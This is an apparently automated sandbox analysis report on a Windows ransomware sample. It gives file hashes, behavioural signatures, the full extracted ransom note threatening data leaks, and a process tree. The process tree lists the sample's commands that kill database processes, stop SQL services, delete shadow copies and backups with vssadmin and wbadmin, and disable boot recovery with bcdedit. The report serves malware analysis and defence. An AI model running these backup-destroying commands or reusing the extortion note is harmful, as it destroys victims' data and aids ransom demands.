Analysis

  • max time kernel
    153s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-02-2024 17:56

General

  • Target

    c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe

  • Size

    332KB

  • MD5

    0d5ccd706f75461b3fb9c56bc87b5c6f

  • SHA1

    0c3755209682d5632a5fb20143ea7d93be5dc5e8

  • SHA256

    c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1

  • SHA512

    9288cdd355d9a6fab846fda6b46ea6c67ec706e089c02d9718661b754bb45be020e97bd48d7876d82a525dfaedc17f6c2303f03160932ea4d6e915f085714131

  • SSDEEP

    6144:aY196WTQqBfFrQlVCuzw/322A1StYDBF+FTKtkV:R96eVFryVHzw/3XOfvtk

Score
10/10

Malware Config

Extracted

Path

C:\odt\How_to_back_files.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">a8FBLZwJ6k7pJGO1ubhxEhO4SafK4NnFiWl5xI29nv0Sp4+uPWcE6G9WtersHn4R3FFCCfIneDu31ho1CuFRhffiG5c90mKnRyYzXEezz+k/Vv+qQVYi+qhZf4h8Ieug4T7cjefE/MILiRqc0wlA0wfvFvRVwyRDCScQW7YBlK0sVzeBofcVoSvCgUMtPdG2qbiJOBaSb7hWWW5kMxC7n5215/OTrCjqqAQn+gPKiPaQoAMeTKuXViTNHvczNTw7BOP9U12Bs0kChiQo/J8H3IQ6c2l7Pb1bmHbvNmUDtk1gCOXUTKeU1khg/VQ+mLZO7AwBb/Rt/+AqcjEkXQYXEw/GubnS/0NcJ0FmBAwYFH1o6/Rpma9hPeIXC4NY9S4BQb1Zx42nN1og86IEe6evxPF4scvnCgiLSP79IPAL+bwYeMbAXqjwAr6iKF6+EEAXa7WqY0oyfvdVqdHcFFR43id5/YUj23DIQlq/xntMgzgpzewNcn++NMTdoR8IY6oHHzLQ3zAT/BdOV0PgeUkzGtVl62lfB+UnA0cOgXiIOJTMUbAJUEsj8aRauptmb8j/zXXEKdeFi9XQkVsIWLKV1JWlPiR9eKWyhE98P6mnL2HievgvAn4mpklFGF+BugB928gO1zmNw1r/LyOyOQMhsd3ovEi+rMqc2NOxQo/vaGEJt190xi51/a+577z5+Ghs/G0weStSFE2p0fSmR9B070mgDqRb7ROfXTgzxWTpWQZReMMHZUKy6rN5gakbgfnza8bwC4jvIDV5ggT/zYA8gGYQ03NFquNuRSSV9gsE7QmK3nVuDG5Yq2s4watR1KmkNjtSaCMW9jwr4YNRCL2vDASslYNdVJ698EO8ycpcXe3KDOSe9BGENDVja5OMo8WAwtpXbHBG+QOgXlin11+Viam8JFSBEdq6LM4SPI4En1n0sljJiFV96A7x8QCNzT3jG67MmaIPvzrEQES3USKE4FMXZZ/Tj8Yo7QImWMPi0Zr5cQl2NTHJfRjtV4wI0f6Rr1Lipt6vzmdFiFmcM7wB1jYzw8V7UXzHOW9mgiqoRLe53o+vZzHJYHf9PXtRqCTd6z9GhDViezb5xA2f7b3f5gMFlwu9cSF9bVv/jO8C6IU3+g0PgebiGvdHGJG52yWPU1tzzBIGyaEPu87T5TKt/VlzmFdZfLaQjE42nh/NRdNCX7V/v45UnWffMJliVhGeirfzO1iRRCixkbLup0dXU7Tz7yd4hK1biw/O5gRtvvx57eLGnXzk3KGNsvH9QVQKY8ULJnaQhxAqG6A5xpgWj6fuPHCVOr0CAp3fjbCWLtdkv0em+ns4zYeXN5RToNqnOxqHUdipJCaTOfdZ/1uD5yn2HrJQb1UNC43OixYU9wOmmuxT6JEaU9o45HluAd78bmpuUCgoRDhPOpHiZubAdxs20VHNGFLN1F4TeFTesO9VZTBYywlIMImq821fL9WI7YMdeR2sW+e7WvlLdLdDCRvRQit64AzefqTR6ElYqVoE/VwCvDh13FDvU6Kw8wY5gp5n/BV9idRyFprHa17cjjFRULRB6jPrNhQ7kuyGX40FbttL3+lu4AvQg4mFAmtWzPE/d9O9DOXuotL0Gj2WtFIono08twb2kelmwszoNr5q1OVhglmjmyXgIDrFmAXlEsB1Nx51VX2mwg63eJ+/X6BO/QYCLronfu5IPAOPGxs=</span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>
Emails

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (343) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3300
      • C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
        "C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Enumerates connected drives
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:3376
        • C:\Windows\SysWOW64\cmd.exe
          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1096
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
            4⤵
              PID:4924
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1884
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4796
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlbrowser.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3864
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2688
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3832
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sql writer.exe
                5⤵
                • Kills process with taskkill
                PID:4404
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3624
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2356
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlserv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1472
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:212
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3088
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im msmdsrv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1316
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1684
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3400
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im MsDtsSrvr.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:996
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3276
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4292
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlceip.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2816
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4524
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3500
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im fdlauncher.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1004
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2420
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4488
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im Ssms.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:880
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
            3⤵
              PID:4348
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                4⤵
                  PID:2260
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im SQLAGENT.EXE
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1036
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                3⤵
                  PID:4536
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                    4⤵
                      PID:768
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im fdhost.exe
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3156
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                    3⤵
                      PID:2668
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                        4⤵
                          PID:3904
                          • C:\Windows\system32\taskkill.exe
                            taskkill -f -im ReportingServicesService.exe
                            5⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4612
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                        3⤵
                          PID:3076
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                            4⤵
                              PID:3092
                              • C:\Windows\system32\taskkill.exe
                                taskkill -f -im msftesql.exe
                                5⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4356
                          • C:\Windows\SysWOW64\cmd.exe
                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                            3⤵
                              PID:4412
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                                4⤵
                                  PID:4196
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill -f -im pg_ctl.exe
                                    5⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1316
                              • C:\Windows\SysWOW64\cmd.exe
                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                3⤵
                                  PID:3836
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                    4⤵
                                      PID:2220
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill -f -impostgres.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:1684
                                  • C:\Windows\SysWOW64\cmd.exe
                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                    3⤵
                                      PID:4824
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                        4⤵
                                          PID:4344
                                          • C:\Windows\system32\net.exe
                                            net stop MSSQLServerADHelper100
                                            5⤵
                                              PID:3276
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                                6⤵
                                                  PID:4424
                                          • C:\Windows\SysWOW64\cmd.exe
                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                            3⤵
                                              PID:2284
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                                4⤵
                                                  PID:1484
                                                  • C:\Windows\system32\net.exe
                                                    net stop MSSQL$ISARS
                                                    5⤵
                                                      PID:4132
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 stop MSSQL$ISARS
                                                        6⤵
                                                          PID:3228
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                    3⤵
                                                      PID:4516
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                        4⤵
                                                          PID:332
                                                          • C:\Windows\system32\net.exe
                                                            net stop MSSQL$MSFW
                                                            5⤵
                                                              PID:2932
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop MSSQL$MSFW
                                                                6⤵
                                                                  PID:2084
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                            3⤵
                                                              PID:2260
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                                4⤵
                                                                  PID:2948
                                                                  • C:\Windows\system32\net.exe
                                                                    net stop SQLAgent$ISARS
                                                                    5⤵
                                                                      PID:2480
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                                        6⤵
                                                                          PID:2980
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                    3⤵
                                                                      PID:3124
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                        4⤵
                                                                          PID:3156
                                                                          • C:\Windows\system32\net.exe
                                                                            net stop SQLAgent$MSFW
                                                                            5⤵
                                                                              PID:4972
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                                6⤵
                                                                                  PID:1956
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                                            3⤵
                                                                              PID:2916
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                                                4⤵
                                                                                  PID:4900
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net stop SQLBrowser
                                                                                    5⤵
                                                                                      PID:3332
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 stop SQLBrowser
                                                                                        6⤵
                                                                                          PID:1132
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                    3⤵
                                                                                      PID:1548
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                        4⤵
                                                                                          PID:4604
                                                                                          • C:\Windows\system32\net.exe
                                                                                            net stop REportServer$ISARS
                                                                                            5⤵
                                                                                              PID:3840
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                C:\Windows\system32\net1 stop REportServer$ISARS
                                                                                                6⤵
                                                                                                  PID:4208
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                                            3⤵
                                                                                              PID:1100
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                                                4⤵
                                                                                                  PID:456
                                                                                                  • C:\Windows\system32\net.exe
                                                                                                    net stop SQLWriter
                                                                                                    5⤵
                                                                                                      PID:972
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 stop SQLWriter
                                                                                                        6⤵
                                                                                                          PID:1556
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                    3⤵
                                                                                                      PID:996
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                        4⤵
                                                                                                          PID:3104
                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                            vssadmin.exe Delete Shadows /All /Quiet
                                                                                                            5⤵
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:1468
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                        3⤵
                                                                                                          PID:3308
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                            4⤵
                                                                                                              PID:4292
                                                                                                              • C:\Windows\system32\wbadmin.exe
                                                                                                                wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                5⤵
                                                                                                                • Deletes System State backups
                                                                                                                PID:3532
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                            3⤵
                                                                                                              PID:32
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                4⤵
                                                                                                                  PID:4692
                                                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                                                    wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                    5⤵
                                                                                                                      PID:4836
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                  3⤵
                                                                                                                    PID:2220
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                      4⤵
                                                                                                                        PID:3836
                                                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                                                          wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                          5⤵
                                                                                                                          • Deletes system backups
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:4396
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                      3⤵
                                                                                                                        PID:4532
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                          4⤵
                                                                                                                            PID:3396
                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                              bcdedit.exe /set {default} recoverynabled No
                                                                                                                              5⤵
                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                              PID:1096
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                          3⤵
                                                                                                                            PID:3564
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                              4⤵
                                                                                                                                PID:740
                                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                                  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                  5⤵
                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                  PID:2948
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                              3⤵
                                                                                                                                PID:2884
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                  4⤵
                                                                                                                                    PID:4496
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3960
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
                                                                                                                                \\?\C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -network
                                                                                                                                2⤵
                                                                                                                                • System policy modification
                                                                                                                                PID:3292
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c pause
                                                                                                                                  3⤵
                                                                                                                                    PID:1472
                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2716
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
                                                                                                                                1⤵
                                                                                                                                  PID:4136

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\odt\How_to_back_files.html

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                  MD5

                                                                                                                                  6fedb1c2ef1dde2da864bf98b271675b

                                                                                                                                  SHA1

                                                                                                                                  1393fd16b3c6468e6dbd009e90644d51eaff7ecb

                                                                                                                                  SHA256

                                                                                                                                  c2ec79ee0c21c94c4c68339e5e569ef2e8d2d716fe3b9ba22070699b6a2499ca

                                                                                                                                  SHA512

                                                                                                                                  5f3f2c1f4dc7a7761c70dd996a152616d8a948e577ff451330df6f8aa0349fad5c82b021f73fa3d880a647094a6fb217c14c11ffee925a11136af8bb139d8e64